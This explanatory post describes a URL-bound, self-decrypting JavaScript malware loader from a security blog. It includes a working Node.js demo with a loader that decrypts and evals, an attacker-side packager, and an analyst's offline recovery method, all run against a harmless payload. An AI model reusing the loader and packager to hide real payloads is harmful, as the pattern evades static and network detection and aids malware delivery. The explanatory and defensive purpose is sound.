How does this self-decrypting script thwart security researchers? Summarized from the Trends blog:
- It retrieves the URL from which the malicious script was loaded.
- It retrieves the source text of its own decryption function and appends the URL string to it.
- It computes a CRC over that combined string (function source plus URL).
- It uses the resulting CRC as the key to decrypt an encrypted code blob embedded in the script body.
- It executes the decrypted code with eval().
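The five steps above, as an added working model that is not code from the Trends blog post or from the malware it describes. The hosting URL, the payload, and the XOR stream cipher are assumptions (the post does not say which cipher the real script used); Function.prototype.toString stands in for the arguments.callee.toString() trick, and the ciphertext sits outside the function so that it does not feed back into its own key. Beyond the post, the example also shows the attacker-side packaging step and the analyst's counter: recomputing the key from the captured script and the URL it was served from.

```javascript
// Added example, not code from the Trends blog post. URL-bound,
// self-decrypting loader: key = CRC-32(own source + URL). The hosting
// URL, payload and toy cipher below are constructed for the demo.

// CRC-32 (IEEE 802.3 polynomial) over the low byte of each character.
function crc32(str) {
  let crc = 0xFFFFFFFF;
  for (let i = 0; i < str.length; i++) {
    crc ^= str.charCodeAt(i) & 0xFF;
    for (let k = 0; k < 8; k++) {
      crc = (crc >>> 1) ^ (0xEDB88320 & -(crc & 1));
    }
  }
  return (crc ^ 0xFFFFFFFF) >>> 0;
}

// Toy symmetric stream cipher keyed by the 32-bit CRC: XOR each byte with
// an LCG keystream. Assumption: a stand-in for the real script's cipher.
function xorStream(bytes, key) {
  let s = key >>> 0;
  const out = new Uint8Array(bytes.length);
  for (let i = 0; i < bytes.length; i++) {
    s = (Math.imul(s, 1103515245) + 12345) >>> 0;
    out[i] = bytes[i] ^ ((s >>> 16) & 0xFF);
  }
  return out;
}

const toHex = (b) => Array.from(b, (x) => x.toString(16).padStart(2, '0')).join('');
const fromHex = (h) => Uint8Array.from(h.match(/../g) || [], (x) => parseInt(x, 16));
const enc = new TextEncoder();
const dec = new TextDecoder();

// The loader as it would sit in the malicious script: own source + URL
// -> CRC-32 -> decrypt the blob from the script body -> eval. Editing this
// function in any way (e.g. eval -> console.log) changes its text, so the
// CRC and therefore the key no longer match.
function loader(pageUrl, ciphertextHex) {
  const ownSource = loader.toString();
  const key = crc32(ownSource + pageUrl);
  const plaintext = dec.decode(xorStream(fromHex(ciphertextHex), key));
  return eval(plaintext);
}

// Attacker-side packager: must know the final hosting URL, because the key
// is derived from it. A mirror, cache or sandbox at another URL gets junk.
function pack(pageUrl, payloadSource) {
  const key = crc32(loader.toString() + pageUrl);
  return toHex(xorStream(enc.encode(payloadSource), key));
}

// Run the loader; garbage plaintext normally fails to parse, which eval
// reports as a SyntaxError, so a failed load returns null.
function tryLoad(pageUrl, ciphertextHex) {
  try {
    return loader(pageUrl, ciphertextHex);
  } catch (e) {
    return null;
  }
}

// Analyst's counter: the key is not secret, only URL-bound. With the
// captured script and the URL it was served from, recompute the key and
// decrypt offline without ever calling eval.
function recoverPayload(pageUrl, ciphertextHex) {
  const key = crc32(loader.toString() + pageUrl);
  return dec.decode(xorStream(fromHex(ciphertextHex), key));
}

// Why the classic host-side edit fails: replacing eval with a logging call
// changes the function text and hence the derived key.
function keyAfterPatch(pageUrl) {
  const patched = loader.toString().replace('eval(', 'console.log(');
  return { original: crc32(loader.toString() + pageUrl),
           patched: crc32(patched + pageUrl) };
}

// Constructed sample: hypothetical hosting URL and a harmless payload.
const HOSTING_URL = 'http://malicious.example/js/loader.js';
const MIRROR_URL = 'http://mirror.example/js/loader.js';
const PAYLOAD = "(function () { return 'payload ran'; })()";
const CIPHERTEXT = pack(HOSTING_URL, PAYLOAD);

if (typeof require !== 'undefined' && require.main === module) {
  console.log('from hosting URL:', tryLoad(HOSTING_URL, CIPHERTEXT));
  console.log('from mirror URL :', tryLoad(MIRROR_URL, CIPHERTEXT));
  console.log('recovered offline:', recoverPayload(HOSTING_URL, CIPHERTEXT));
  console.log('keys after patch:', keyAfterPatch(HOSTING_URL));
}
```

Run with node. The loader only yields the payload when called with the exact hosting URL and an unmodified function body; recoverPayload shows that an analyst who captured both the script and its URL needs neither a browser nor eval to read it.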
It's not precisely rocket science, but it's more than sufficient to bypass static analysis and network-based detection: the key is never stored in the file, so a static parser or a network sensor sees only ciphertext plus a CRC routine, and the usual analyst shortcut of editing the decryption function to replace eval() with a print changes the function's CRC and therefore the key.
The particular technique of tying the decryption key to the URL of the source has been discussed for several years, and has been tried in the past (legitimately) by various Web sites that endeavor to protect their content from plagiarism. It's neither elegant nor a robust protection mechanism against host-based manipulation: anyone who has both the script and the URL it was served from can recompute the CRC and decrypt it offline, and running it with the original URL supplied, or intercepting eval without touching the function text, defeats it. From a network perspective, though, it's "good enough".